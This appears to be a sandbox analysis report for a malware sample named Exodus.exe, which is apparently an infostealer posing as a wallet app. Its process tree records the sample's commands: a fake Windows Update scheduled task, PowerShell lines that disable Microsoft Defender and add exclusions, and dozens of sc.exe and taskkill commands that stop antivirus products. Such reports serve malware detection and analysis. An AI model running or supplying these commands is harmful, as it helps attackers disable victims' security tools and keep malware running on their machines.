Analysis

  • user interaction
    yes
  • max time kernel
    572s
  • max time network
    552s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    28/08/2026, 19:15

General

  • Target
    Exodus.exe
  • Size 117.8MB
  • Sample260828-xyabhsstd1
  • SHA256 6ae97fa67147ef805f00cfe3235146f97a316f56883993620656d5ddad15a1ff
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 16 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell and hide display window.

  • Disables one or more Microsoft Defender components 1 TTPs 1 IoCs

    Uses the Powershell Set-MpPreference cmdlet to disable one or more Microsoft Defender components.

  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Stops running service(s) 4 TTPs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 4 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 64 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Executes a command shell one-liner 1 TTPs 2 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 62 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 20 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 38 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
    "C:\Users\Admin\AppData\Local\Temp\Exodus.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5400
    • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
      "C:\Users\Admin\AppData\Local\Temp\Exodus.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -NonInteractive -Command "try { $m = Get-MpComputerStatus -ErrorAction SilentlyContinue; if ($null -eq $m) { 'UNKNOWN'; exit } if ($m.RealTimeProtectionEnabled) { 'ENABLED' } else { 'DISABLED' } } catch { 'UNKNOWN' }"
        3⤵
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2512
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /tn "Microsoft\Windows\WindowsUpdate\WindowsUpdateCacheRefresh" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe" /sc onlogon /rl highest /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5364
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
        C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3392
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
          C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:704
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
    C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3472
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
      C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
      2⤵
      • Looks for VirtualBox Guest Additions in registry
      • Looks for VMWare Tools registry key
      • Deletes itself
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3928
      • C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\shell_helper.exe
        C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\shell_helper.exe disable_av
        3⤵
        • Modifies Windows Defender DisableAntiSpyware settings
        • Modifies Windows Defender Real-time Protection settings
        • Executes dropped EXE
        • Windows security modification
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true -DisableOnAccessProtection $true -DisableScanOnRealtimeEnable $true -DisableIOAVProtection $true -DisablePrivacyMode $true -MAPSReporting 0 -SubmitSamplesConsent 2"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Disables one or more Microsoft Defender components
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4704
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config WinDefend start= disabled
          4⤵
            PID:5636
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" stop WinDefend
            4⤵
              PID:5332
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config WdNisSvc start= disabled
              4⤵
              • Launches sc.exe
              PID:5952
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" stop WdNisSvc
              4⤵
                PID:3448
              • C:\Windows\SYSTEM32\sc.exe
                "sc.exe" config Sense start= disabled
                4⤵
                  PID:5320
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" "avast! Antivirus" start= disabled
                  4⤵
                  • Launches sc.exe
                  PID:4068
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" stop "avast! Antivirus"
                  4⤵
                  • Launches sc.exe
                  PID:2756
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" "Avast Antivirus" start= disabled
                  4⤵
                  • Launches sc.exe
                  PID:3852
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" stop "Avast Antivirus"
                  4⤵
                  • Launches sc.exe
                  PID:4608
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" "avast! Firewall" start= disabled
                  4⤵
                  • Launches sc.exe
                  PID:5936
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" stop "avast! Firewall"
                  4⤵
                  • Launches sc.exe
                  PID:1856
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" "aswSP" start= disabled
                  4⤵
                  • Launches sc.exe
                  PID:4548
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" stop "aswSP"
                  4⤵
                  • Launches sc.exe
                  PID:3148
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" "aswNetSec" start= disabled
                  4⤵
                  • Launches sc.exe
                  PID:552
                • C:\Windows\SYSTEM32\sc.exe
                  "sc.exe" stop "aswNetSec"
                  4⤵
                    PID:3104
                  • C:\Windows\SYSTEM32\sc.exe
                    "sc.exe" "Norton Security" start= disabled
                    4⤵
                      PID:5496
                    • C:\Windows\SYSTEM32\sc.exe
                      "sc.exe" stop "Norton Security"
                      4⤵
                        PID:2616
                      • C:\Windows\SYSTEM32\sc.exe
                        "sc.exe" "Norton 360" start= disabled
                        4⤵
                        • Launches sc.exe
                        PID:2860
                      • C:\Windows\SYSTEM32\sc.exe
                        "sc.exe" stop "Norton 360"
                        4⤵
                          PID:2512
                        • C:\Windows\SYSTEM32\sc.exe
                          "sc.exe" "Symantec Antivirus" start= disabled
                          4⤵
                          • Launches sc.exe
                          PID:2780
                        • C:\Windows\SYSTEM32\sc.exe
                          "sc.exe" stop "Symantec Antivirus"
                          4⤵
                          • Launches sc.exe
                          PID:3684
                        • C:\Windows\SYSTEM32\sc.exe
                          "sc.exe" "Norton Internet Security" start= disabled
                          4⤵
                            PID:1084
                          • C:\Windows\SYSTEM32\sc.exe
                            "sc.exe" stop "Norton Internet Security"
                            4⤵
                            • Launches sc.exe
                            PID:1644
                          • C:\Windows\SYSTEM32\sc.exe
                            "sc.exe" "ccSetMgr" start= disabled
                            4⤵
                            • Launches sc.exe
                            PID:2612
                          • C:\Windows\SYSTEM32\sc.exe
                            "sc.exe" stop "ccSetMgr"
                            4⤵
                            • Launches sc.exe
                            PID:5868
                          • C:\Windows\SYSTEM32\sc.exe
                            "sc.exe" "ccEvtMgr" start= disabled
                            4⤵
                              PID:6004
                            • C:\Windows\SYSTEM32\sc.exe
                              "sc.exe" stop "ccEvtMgr"
                              4⤵
                                PID:2936
                              • C:\Windows\SYSTEM32\sc.exe
                                "sc.exe" "NIS" start= disabled
                                4⤵
                                  PID:1028
                                • C:\Windows\SYSTEM32\sc.exe
                                  "sc.exe" stop "NIS"
                                  4⤵
                                  • Launches sc.exe
                                  PID:5464
                                • C:\Windows\SYSTEM32\sc.exe
                                  "sc.exe" "NAV" start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:4484
                                • C:\Windows\SYSTEM32\sc.exe
                                  "sc.exe" stop "NAV"
                                  4⤵
                                    PID:1200
                                  • C:\Windows\SYSTEM32\sc.exe
                                    "sc.exe" "McAfee Firewall" start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    PID:4360
                                  • C:\Windows\SYSTEM32\sc.exe
                                    "sc.exe" stop "McAfee Firewall"
                                    4⤵
                                    • Launches sc.exe
                                    PID:3728
                                  • C:\Windows\SYSTEM32\sc.exe
                                    "sc.exe" "McAfee WebAdvisor" start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    PID:5076
                                  • C:\Windows\SYSTEM32\sc.exe
                                    "sc.exe" stop "McAfee WebAdvisor"
                                    4⤵
                                      PID:5968
                                    • C:\Windows\SYSTEM32\sc.exe
                                      "sc.exe" "McAfee VirusScan" start= disabled
                                      4⤵
                                        PID:3752
                                      • C:\Windows\SYSTEM32\sc.exe
                                        "sc.exe" stop "McAfee VirusScan"
                                        4⤵
                                        • Launches sc.exe
                                        PID:944
                                      • C:\Windows\SYSTEM32\sc.exe
                                        "sc.exe" "McAfee Framework" start= disabled
                                        4⤵
                                        • Launches sc.exe
                                        PID:3932
                                      • C:\Windows\SYSTEM32\sc.exe
                                        "sc.exe" stop "McAfee Framework"
                                        4⤵
                                        • Launches sc.exe
                                        PID:3496
                                      • C:\Windows\SYSTEM32\sc.exe
                                        "sc.exe" "McAfee McShield" start= disabled
                                        4⤵
                                        • Launches sc.exe
                                        PID:2408
                                      • C:\Windows\SYSTEM32\sc.exe
                                        "sc.exe" stop "McAfee McShield"
                                        4⤵
                                        • Launches sc.exe
                                        PID:4940
                                      • C:\Windows\SYSTEM32\sc.exe
                                        "sc.exe" "McAfee SiteAdvisor" start= disabled
                                        4⤵
                                          PID:4464
                                        • C:\Windows\SYSTEM32\sc.exe
                                          "sc.exe" stop "McAfee SiteAdvisor"
                                          4⤵
                                          • Launches sc.exe
                                          PID:5756
                                        • C:\Windows\SYSTEM32\sc.exe
                                          "sc.exe" "Kaspersky Security" start= disabled
                                          4⤵
                                            PID:5084
                                          • C:\Windows\SYSTEM32\sc.exe
                                            "sc.exe" stop "Kaspersky Security"
                                            4⤵
                                            • Launches sc.exe
                                            PID:1096
                                          • C:\Windows\SYSTEM32\sc.exe
                                            "sc.exe" "Kaspersky Anti-Virus" start= disabled
                                            4⤵
                                              PID:52
                                            • C:\Windows\SYSTEM32\sc.exe
                                              "sc.exe" stop "Kaspersky Anti-Virus"
                                              4⤵
                                              • Launches sc.exe
                                              PID:6112
                                            • C:\Windows\SYSTEM32\sc.exe
                                              "sc.exe" "kavfs" start= disabled
                                              4⤵
                                                PID:5944
                                              • C:\Windows\SYSTEM32\sc.exe
                                                "sc.exe" stop "kavfs"
                                                4⤵
                                                  PID:1004
                                                • C:\Windows\SYSTEM32\sc.exe
                                                  "sc.exe" "kavfswp" start= disabled
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:3804
                                                • C:\Windows\SYSTEM32\sc.exe
                                                  "sc.exe" stop "kavfswp"
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:5064
                                                • C:\Windows\SYSTEM32\sc.exe
                                                  "sc.exe" "Bitdefender" start= disabled
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:5060
                                                • C:\Windows\SYSTEM32\sc.exe
                                                  "sc.exe" stop "Bitdefender"
                                                  4⤵
                                                    PID:1788
                                                  • C:\Windows\SYSTEM32\sc.exe
                                                    "sc.exe" "Bitdefender Antivirus" start= disabled
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:5628
                                                  • C:\Windows\SYSTEM32\sc.exe
                                                    "sc.exe" stop "Bitdefender Antivirus"
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:2088
                                                  • C:\Windows\SYSTEM32\sc.exe
                                                    "sc.exe" "Bitdefender Security" start= disabled
                                                    4⤵
                                                      PID:2184
                                                    • C:\Windows\SYSTEM32\sc.exe
                                                      "sc.exe" stop "Bitdefender Security"
                                                      4⤵
                                                        PID:4652
                                                      • C:\Windows\SYSTEM32\sc.exe
                                                        "sc.exe" "ESET Security" start= disabled
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:4144
                                                      • C:\Windows\SYSTEM32\sc.exe
                                                        "sc.exe" stop "ESET Security"
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:4308
                                                      • C:\Windows\SYSTEM32\sc.exe
                                                        "sc.exe" "ESET Service" start= disabled
                                                        4⤵
                                                          PID:2852
                                                        • C:\Windows\SYSTEM32\sc.exe
                                                          "sc.exe" stop "ESET Service"
                                                          4⤵
                                                          • Launches sc.exe
                                                          PID:4772
                                                        • C:\Windows\SYSTEM32\sc.exe
                                                          "sc.exe" "ekrn" start= disabled
                                                          4⤵
                                                          • Launches sc.exe
                                                          PID:5540
                                                        • C:\Windows\SYSTEM32\sc.exe
                                                          "sc.exe" stop "ekrn"
                                                          4⤵
                                                          • Launches sc.exe
                                                          PID:5364
                                                        • C:\Windows\SYSTEM32\sc.exe
                                                          "sc.exe" "eamonm" start= disabled
                                                          4⤵
                                                          • Launches sc.exe
                                                          PID:1508
                                                        • C:\Windows\SYSTEM32\sc.exe
                                                          "sc.exe" stop "eamonm"
                                                          4⤵
                                                          • Launches sc.exe
                                                          PID:4156
                                                        • C:\Windows\SYSTEM32\sc.exe
                                                          "sc.exe" "Malwarebytes Service" start= disabled
                                                          4⤵
                                                            PID:5876
                                                          • C:\Windows\SYSTEM32\sc.exe
                                                            "sc.exe" stop "Malwarebytes Service"
                                                            4⤵
                                                            • Launches sc.exe
                                                            PID:5788
                                                          • C:\Windows\SYSTEM32\sc.exe
                                                            "sc.exe" "MBAMService" start= disabled
                                                            4⤵
                                                            • Launches sc.exe
                                                            PID:636
                                                          • C:\Windows\SYSTEM32\sc.exe
                                                            "sc.exe" stop "MBAMService"
                                                            4⤵
                                                            • Launches sc.exe
                                                            PID:1312
                                                          • C:\Windows\SYSTEM32\sc.exe
                                                            "sc.exe" "Malwarebytes" start= disabled
                                                            4⤵
                                                            • Launches sc.exe
                                                            PID:2368
                                                          • C:\Windows\SYSTEM32\sc.exe
                                                            "sc.exe" stop "Malwarebytes"
                                                            4⤵
                                                              PID:1804
                                                            • C:\Windows\SYSTEM32\sc.exe
                                                              "sc.exe" "Trend Micro" start= disabled
                                                              4⤵
                                                                PID:1376
                                                              • C:\Windows\SYSTEM32\sc.exe
                                                                "sc.exe" stop "Trend Micro"
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:4184
                                                              • C:\Windows\SYSTEM32\sc.exe
                                                                "sc.exe" "tmccsf" start= disabled
                                                                4⤵
                                                                  PID:5884
                                                                • C:\Windows\SYSTEM32\sc.exe
                                                                  "sc.exe" stop "tmccsf"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1080
                                                                • C:\Windows\SYSTEM32\sc.exe
                                                                  "sc.exe" "TmPfw" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:3944
                                                                • C:\Windows\SYSTEM32\sc.exe
                                                                  "sc.exe" stop "TmPfw"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:4104
                                                                • C:\Windows\SYSTEM32\sc.exe
                                                                  "sc.exe" "OfficeScanNT" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1260
                                                                • C:\Windows\SYSTEM32\sc.exe
                                                                  "sc.exe" stop "OfficeScanNT"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:3112
                                                                • C:\Windows\SYSTEM32\sc.exe
                                                                  "sc.exe" "AVG Antivirus" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:5316
                                                                • C:\Windows\SYSTEM32\sc.exe
                                                                  "sc.exe" stop "AVG Antivirus"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2480
                                                                • C:\Windows\SYSTEM32\sc.exe
                                                                  "sc.exe" "AVG Security" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1884
                                                                • C:\Windows\SYSTEM32\sc.exe
                                                                  "sc.exe" stop "AVG Security"
                                                                  4⤵
                                                                    PID:4680
                                                                  • C:\Windows\SYSTEM32\sc.exe
                                                                    "sc.exe" "360TotalSecurity" start= disabled
                                                                    4⤵
                                                                    • Launches sc.exe
                                                                    PID:4836
                                                                  • C:\Windows\SYSTEM32\sc.exe
                                                                    "sc.exe" stop "360TotalSecurity"
                                                                    4⤵
                                                                    • Launches sc.exe
                                                                    PID:4740
                                                                  • C:\Windows\SYSTEM32\sc.exe
                                                                    "sc.exe" "360Safe" start= disabled
                                                                    4⤵
                                                                      PID:880
                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                      "sc.exe" stop "360Safe"
                                                                      4⤵
                                                                      • Launches sc.exe
                                                                      PID:1384
                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                      "sc.exe" "WebrootSecureAnywhere" start= disabled
                                                                      4⤵
                                                                      • Launches sc.exe
                                                                      PID:4624
                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                      "sc.exe" stop "WebrootSecureAnywhere"
                                                                      4⤵
                                                                        PID:2744
                                                                      • C:\Windows\SYSTEM32\sc.exe
                                                                        "sc.exe" "TotalSecurity" start= disabled
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:3512
                                                                      • C:\Windows\SYSTEM32\sc.exe
                                                                        "sc.exe" stop "TotalSecurity"
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:1716
                                                                      • C:\Windows\SYSTEM32\sc.exe
                                                                        "sc.exe" "IKEEXE" start= disabled
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:1960
                                                                      • C:\Windows\SYSTEM32\sc.exe
                                                                        "sc.exe" stop "IKEEXE"
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:5924
                                                                      • C:\Windows\SYSTEM32\sc.exe
                                                                        "sc.exe" "ZoneAlarm" start= disabled
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:4592
                                                                      • C:\Windows\SYSTEM32\sc.exe
                                                                        "sc.exe" stop "ZoneAlarm"
                                                                        4⤵
                                                                          PID:1220
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM avastui.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1424
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM avgnt.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1280
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM avgui.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3288
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM ccSvcHst.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4588
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM mcshield.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:256
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM msmpeng.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1072
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM kav.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:708
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM kaspersky.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:6048
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM bdagent.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2536
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM ekrn.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5820
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM egui.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4168
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM mbam.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5504
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM mbamservice.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2904
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM TMBMSRV.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3680
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM PccNTMon.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4912
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM 360tray.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5456
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM 360sd.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5004
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM WRSA.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2992
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM vsserv.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4224
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /F /IM V3Svc.exe /T
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5140
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\ProfileSync""
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1892
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionProcess "ProfileSync""
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:3704
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath "C:\Windows\system32\svchost.exe""
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:3864
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionProcess "svchost.exe""
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:5564
                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\shell_helper.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\shell_helper.exe add_exclusion QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxMb2NhbFxNaWNyb3NvZnRcV2luZG93c1xQcm9maWxlU3luYw==
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:4192
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync""
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:4688
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionProcess "ProfileSync""
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:5448
                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\shell_helper.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\shell_helper.exe re-enable_defender
                                                                        3⤵
                                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                        • Executes dropped EXE
                                                                        • Windows security modification
                                                                        PID:5800
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $false -DisableBehaviorMonitoring $false -DisableOnAccessProtection $false -DisableIOAVProtection $false -DisablePrivacyMode $false -MAPSReporting 1 -SubmitSamplesConsent 1"
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:3260
                                                                        • C:\Windows\SYSTEM32\sc.exe
                                                                          "sc.exe" config WinDefend start= demand
                                                                          4⤵
                                                                          • Launches sc.exe
